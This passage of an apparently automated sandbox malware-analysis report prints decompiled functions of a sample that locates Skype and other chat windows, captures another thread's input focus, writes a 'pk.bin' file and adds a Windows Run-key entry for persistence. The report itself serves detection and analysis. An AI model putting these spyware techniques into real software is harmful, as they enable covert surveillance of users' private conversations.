				if(_t10 == _t20[4] && strcmp(_t20[3], 0x455358) == 0 && IsWindowVisible(_t19) != 0) {
					GetWindowRect(_t19, 0x455348);
					_t15 =  *0x45534c; // 0x0
					if(_t20[2] == 0) {
						if(_t15 < _t20[1]) {
							goto L7;
						}
					} else {
						if(_t15 > _t20[1]) {
							L7:
							_t20[1] = _t15;
							 *_t20 = _t19;
						}
					}
				}
				_t11 = 1;
				return _t11;
			}

0x0040fdbb
0x0040fdc8
0x0040fdcf
0x0040fdd5
0x0040fddc
0x0040fdfe
0x0040fe08
0x0040fe0d
0x0040fe19
0x00000000
0x00000000
0x0040fe0f
0x0040fe12
0x0040fe1b
0x0040fe1b
0x0040fe1e
0x0040fe1e
0x0040fe12
0x0040fe0d
0x0040fe22
0x0040fe26

APIs

GetClassNameA.USER32(?,00455358,00000064), ref: 0040FDC8
GetParent.USER32(?), ref: 0040FDCF
strcmp.MSVCRT ref: 0040FDE2
IsWindowVisible.USER32(?), ref: 0040FDEE
GetWindowRect.USER32 ref: 0040FDFE

Strings

XSE, xrefs: 0040FDBF

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Window$ClassNameParentRectVisiblestrcmp
String ID: XSE
API String ID: 2044700880-181280146
Opcode ID: 26800ccf7abb6be9b8ba418c830c3197e91a7cfd7bdcd88d619378267546e552
Instruction ID: 9d5605630afb518caf01d78ee7b21bd23e046c633ce2dfaafb79efa3c1692723
Opcode Fuzzy Hash: 26800ccf7abb6be9b8ba418c830c3197e91a7cfd7bdcd88d619378267546e552
Instruction Fuzzy Hash: AA01A2711007009FD3308BA1E888B3BB7E9EBD5712B10483FF545E6AE1D338A84997A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B44B, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040B44B(void* __ecx) {
				void* _t21;
				signed int _t34;
				void* _t36;

				E0043E4E0(0x43fcb7, _t36);
				 *(_t36 - 0x10) =  *(_t36 - 0x10) & 0x00000000;
				_push( *((intOrPtr*)(_t36 + 0xc)));
				_push(_t36 + 0xc);
				_t21 = E0040FEA7();
				_t34 = 1;
				_push("Conversations - ");
				 *(_t36 - 4) = _t34;
				L0043DFD6();
				if(_t21 <= 0) {
					_push(_t36 + 0xc);
					L0043DD3C();
					 *(_t36 - 0x10) = _t34;
				} else {
					_push(_t21 + 0x10);
					_push( *((intOrPtr*)(_t36 + 8)));
					L0043DFB2();
					 *(_t36 - 0x10) = _t34;
				}
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return  *((intOrPtr*)(_t36 + 8));
			}

0x0040b450
0x0040b456
0x0040b45b
0x0040b461
0x0040b462
0x0040b46e
0x0040b46f
0x0040b474
0x0040b477
0x0040b47e
0x0040b49a
0x0040b49b
0x0040b4a0
0x0040b480
0x0040b486
0x0040b487
0x0040b48a
0x0040b48f
0x0040b48f
0x0040b4a3
0x0040b4aa
0x0040b4b6
0x0040b4be

APIs

__EH_prolog.LIBCMT ref: 0040B450

Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38

#2764.MFC42(Conversations - ), ref: 0040B477
#4277.MFC42(?,-00000010,Conversations - ), ref: 0040B48A
#535.MFC42(?,Conversations - ), ref: 0040B49B
#800.MFC42(?,Conversations - ), ref: 0040B4AA

Strings

Conversations - , xrefs: 0040B46F

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #535#800H_prologMessageSend$#2764#4277#537#823#825Windowmemset
String ID: Conversations -
API String ID: 1799315098-1394769103
Opcode ID: 087e9431ef721fe3878205155414d1ef57084c9a90ecc5403451b4215890f594
Instruction ID: 42e8c25be250e4e65c8f60ddbabb83d61584712909ac3b03973304dc8dfe24a1
Opcode Fuzzy Hash: 087e9431ef721fe3878205155414d1ef57084c9a90ecc5403451b4215890f594
Instruction Fuzzy Hash: 36012C76900119ABDB14EF51D842BED7B68EF18368F00842AF8159A282DB7C9704CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6F9, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040A6F9() {
				signed int _t13;
				void* _t16;
				signed int _t18;
				void* _t25;

				E0043E4E0(0x43faa8, _t25);
				_t18 = 0;
				if( *((intOrPtr*)(_t25 + 8)) == 0 || strncmp( *(_t25 + 0xc), "TskMultiChatForm.UnicodeClass", 0x1d) != 0) {
					_t13 = 0;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					_push(_t25 + 0xc);
					_t16 = E0040FEA7();
					_push("Skype");
					 *(_t25 - 4) = 0;
					L0043DFD6();
					if(_t16 != 0xffffffff) {
						_t18 = 1;
					}
					 *(_t25 - 4) =  *(_t25 - 4) | 0xffffffff;
					L0043DD36();
					_t13 = _t18;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t25 - 0xc));
				return _t13;
			}

0x0040a6fe
0x0040a704
0x0040a709
0x0040a722
0x0040a726
0x0040a726
0x0040a72c
0x0040a72d
0x0040a734
0x0040a73c
0x0040a73f
0x0040a747
0x0040a749
0x0040a749
0x0040a74b
0x0040a752
0x0040a757
0x0040a757
0x0040a75d
0x0040a765

APIs

__EH_prolog.LIBCMT ref: 0040A6FE
strncmp.MSVCRT(?,TskMultiChatForm.UnicodeClass,0000001D), ref: 0040A715
#2764.MFC42(Skype), ref: 0040A73F
#800.MFC42(Skype), ref: 0040A752

Strings

TskMultiChatForm.UnicodeClass, xrefs: 0040A70D
Skype, xrefs: 0040A734

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2764#800H_prologstrncmp
String ID: Skype$TskMultiChatForm.UnicodeClass
API String ID: 2424781069-2311822767
Opcode ID: 698389e905a2032e3afd175398bd690fa8d566962fb51e4dbb53bcaab0c329f3
Instruction ID: 677b73739aae22f38c22365f8432a91294e62a684a10ee34ffab5759a66f3153
Opcode Fuzzy Hash: 698389e905a2032e3afd175398bd690fa8d566962fb51e4dbb53bcaab0c329f3
Instruction Fuzzy Hash: 3AF04435500204BBCB14AF60D882A9E7764EB15368F20D13BF826662D2D73DD619D719

Uniqueness

Uniqueness Score: -1.00%

Function 00422BD3, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00422BD3(intOrPtr __ecx) {
				void* __esi;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t36;
				void* _t38;

				_t21 = E0043E4E0(0x442529, _t38);
				_push(__ecx);
				_t36 = __ecx;
				 *((intOrPtr*)(_t38 - 0x10)) = __ecx;
				 *(_t38 - 4) = 6;
				L0043E39C();
				 *(_t38 - 4) = 5;
				L0043DF6A();
				 *(_t38 - 4) = 4;
				L0043E0A8();
				 *(_t38 - 4) = 3;
				L0043DF6A();
				 *(_t38 - 4) = 2;
				_t22 = L00404F36(_t21, __ecx + 0x118, __ecx);
				 *(_t38 - 4) = 1;
				_t23 = L00404F36(_t22, _t36 + 0xc4, _t36);
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t24 = L00404F36(_t23, _t36 + 0x70, _t36);
				 *(_t38 - 4) =  *(_t38 - 4) | 0xffffffff;
				E0040E7E0();
				 *[fs:0x0] =  *((intOrPtr*)(_t38 - 0xc));
				return _t24;
			}

0x00422bd8
0x00422bdd
0x00422bdf
0x00422be1
0x00422bea
0x00422bf1
0x00422bfc
0x00422c00
0x00422c0b
0x00422c0f
0x00422c1a
0x00422c1e
0x00422c29
0x00422c2d
0x00422c38
0x00422c3c
0x00422c41
0x00422c48
0x00422c4d
0x00422c53
0x00422c5c
0x00422c64

APIs

__EH_prolog.LIBCMT ref: 00422BD8
#686.MFC42(?,?,00422AC5), ref: 00422BF1
#693.MFC42(?,?,00422AC5), ref: 00422C00
#804.MFC42(?,?,00422AC5), ref: 00422C0F
#693.MFC42(?,?,00422AC5), ref: 00422C1E

Strings

)%D, xrefs: 00422BD3

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #693$#686#804H_prolog
String ID: )%D
API String ID: 1106850422-1369436435
Opcode ID: 6e2cf092d2d279f3f04467956644d8d257bd2c6a336cdf64f3aff8223b06b626
Instruction ID: 5bf6bb07a23a0fe2670e0173fdae1fe97064251633f024512ce975b122652448
Opcode Fuzzy Hash: 6e2cf092d2d279f3f04467956644d8d257bd2c6a336cdf64f3aff8223b06b626
Instruction Fuzzy Hash: 9801D870801684DAE725E7B5C5557DDFBB0AF19308F10858EA457632C2CBB82B04C766

Uniqueness

Uniqueness Score: -1.00%

Function 00428BC9, Relevance: 10.5, APIs: 7, Instructions: 33
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00428BC9() {
				long _t9;
				long _t10;
				struct HWND__* _t14;

				_t14 = 0;
				_t10 = GetCurrentThreadId();
				_t9 = GetWindowThreadProcessId(GetForegroundWindow(), 0);
				if(_t9 == _t10) {
					GetFocus();
				} else {
					AttachThreadInput(_t9, _t10, 1);
					_t14 = GetFocus();
					AttachThreadInput(_t9, _t10, 0);
				}
				return _t14;
			}

0x00428bcc
0x00428bd5
0x00428be4
0x00428be8
0x00428c08
0x00428bea
0x00428bf5
0x00428c01
0x00428c03
0x00428c05
0x00428c13

APIs

GetCurrentThreadId.KERNEL32 ref: 00428BCE
GetForegroundWindow.USER32(00000000,?,?,?,00428E19), ref: 00428BD7
GetWindowThreadProcessId.USER32(00000000), ref: 00428BDE
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,00428E19), ref: 00428BF5
GetFocus.USER32 ref: 00428BF7
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,00428E19), ref: 00428C03
GetFocus.USER32 ref: 00428C08

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Thread$AttachFocusInputWindow$CurrentForegroundProcess
String ID:
API String ID: 1429152252-0
Opcode ID: bdc0b0c855d5e61862d08f4c1f439ac1689239f6182ed8ee0a8ba48dc14d3771
Instruction ID: f501bea8363ea4d516894753362f7d4f47a15c5ef74427dcf7aec9a7fe4da11f
Opcode Fuzzy Hash: bdc0b0c855d5e61862d08f4c1f439ac1689239f6182ed8ee0a8ba48dc14d3771
Instruction Fuzzy Hash: 00E06DBA7526586BC6103BF66C4CF1B7B6CE7CB762B11003AF602C2211DEB658409B78

Uniqueness

Uniqueness Score: -1.00%

Function 0040A851, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A851(struct HWND__* _a4, char* _a8) {

				if(_a4 != 0) {
					if(strncmp(_a8, "Chat View", 9) != 0 || FindWindowExA(_a4, 0, "ChatTitle", 0) == 0) {
						goto L1;
					} else {
						return FindWindowExA(_a4, 0, "Chat Link Bar", 0) & 0xffffff00 | _t10 != 0x00000000;
					}
				}
				L1:
				return 0;
			}

0x0040a859
0x0040a875
0x00000000
0x0040a88e
0x00000000
0x0040a89d
0x0040a875
0x0040a85b
0x00000000

APIs

strncmp.MSVCRT(?,Chat View,00000009), ref: 0040A86A
FindWindowExA.USER32 ref: 0040A888
FindWindowExA.USER32 ref: 0040A899

Strings

Chat View, xrefs: 0040A861
ChatTitle, xrefs: 0040A87E
Chat Link Bar, xrefs: 0040A88F

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: FindWindow$strncmp
String ID: Chat Link Bar$Chat View$ChatTitle
API String ID: 3975895692-2749659690
Opcode ID: 99daa3d35be05c2dbb68d3de3584be63f937ab6c4809a1e3edad9f9f02709684
Instruction ID: c2efc92d85586c4d5b20a4276b8e16a20d08bca1911b57061cc6151812dbdf08
Opcode Fuzzy Hash: 99daa3d35be05c2dbb68d3de3584be63f937ab6c4809a1e3edad9f9f02709684
Instruction Fuzzy Hash: F2E0A772541311B6C6116B228C05E0B7FA8DFE2B92B01843ABC00610A2D2388867D6A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A9B3, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A9B3(struct HWND__* _a4, char* _a8) {

				if(_a4 != 0) {
					if(strncmp(_a8, "#32770", 6) != 0 || FindWindowExA(_a4, 0, "MButtonClass", 0) == 0) {
						goto L1;
					} else {
						return FindWindowExA(_a4, 0, "RichEdit20A", 0) & 0xffffff00 | _t10 != 0x00000000;
					}
				}
				L1:
				return 0;
			}

0x0040a9bb
0x0040a9d7
0x00000000
0x0040a9f0
0x00000000
0x0040a9ff
0x0040a9d7
0x0040a9bd
0x00000000

APIs

strncmp.MSVCRT(?,#32770,00000006), ref: 0040A9CC
FindWindowExA.USER32 ref: 0040A9EA
FindWindowExA.USER32 ref: 0040A9FB

Strings

#32770, xrefs: 0040A9C3
RichEdit20A, xrefs: 0040A9F1
MButtonClass, xrefs: 0040A9E0

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: FindWindow$strncmp
String ID: #32770$MButtonClass$RichEdit20A
API String ID: 3975895692-4137904940
Opcode ID: 9016851bed157aeb0aaa87b34a296fcac30576b35f3bd8bba98a55d7420f8003
Instruction ID: cb2bf59678940543a2336d3559745b96064b7d308bbe1a9202bdccee997095dd
Opcode Fuzzy Hash: 9016851bed157aeb0aaa87b34a296fcac30576b35f3bd8bba98a55d7420f8003
Instruction Fuzzy Hash: EBE0EC71704301B6C7115F128D05F477E69DBD2BD1F02443AFC40611E2D238C86ADA69

Uniqueness

Uniqueness Score: -1.00%

Function 00422CCA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00422CCA(void* __ecx) {
				void* __esi;
				void* _t15;
				void* _t26;

				_t15 = E0043E4E0(0x442558, _t26);
				L0043E192();
				_t29 =  *((intOrPtr*)(_t26 + 8));
				if( *((intOrPtr*)(_t26 + 8)) != 0) {
					 *(__ecx + 0x17dd) =  *(__ecx + 0x17dd) & 0x00000000;
					_push("pk.bin");
					_t16 = _t26 + 8;
					_push(0x4558c8);
					_push(_t26 + 8);
					L0043DE20();
					 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
					_t15 = E0040BC5C(__ecx + 0x16b8, _t29,  *_t16);
					 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
					L0043DD36();
					_t30 =  *((char*)(__ecx + 0x17dc));
					if( *((char*)(__ecx + 0x17dc)) != 0) {
						_t15 = E0042817C(__ecx, _t30, 0x4550cc,  *((intOrPtr*)(__ecx + 0x1a14)));
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t26 - 0xc));
				return _t15;
			}

0x00422ccf
0x00422cd7
0x00422cdc
0x00422ce0
0x00422ce2
0x00422ce9
0x00422cee
0x00422cf1
0x00422cf6
0x00422cf7
0x00422cfe
0x00422d08
0x00422d0d
0x00422d14
0x00422d19
0x00422d20
0x00422d2d
0x00422d33
0x00422d20
0x00422d38
0x00422d40

APIs

__EH_prolog.LIBCMT ref: 00422CCF
#2379.MFC42 ref: 00422CD7
#924.MFC42(00000000,004558C8,pk.bin), ref: 00422CF7

Part of subcall function 0040BC5C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040BC82

#800.MFC42(00000000,004558C8,pk.bin), ref: 00422D14

Part of subcall function 0042817C: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0042819B
Part of subcall function 0042817C: lstrcpyA.KERNEL32(?,?), ref: 004281AF
Part of subcall function 0042817C: lstrcatA.KERNEL32(?,004541C8), ref: 004281CF
Part of subcall function 0042817C: lstrcatA.KERNEL32(?,?), ref: 004281D9
Part of subcall function 0042817C: strrchr.MSVCRT ref: 004281ED
Part of subcall function 0042817C: RegCreateKeyA.ADVAPI32(-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 00428210
Part of subcall function 0042817C: lstrlenA.KERNEL32(?), ref: 0042821D
Part of subcall function 0042817C: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000001), ref: 00428236
Part of subcall function 0042817C: RegCloseKey.ADVAPI32(?), ref: 0042823F

Strings

X%D, xrefs: 00422CCA
pk.bin, xrefs: 00422CE9

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
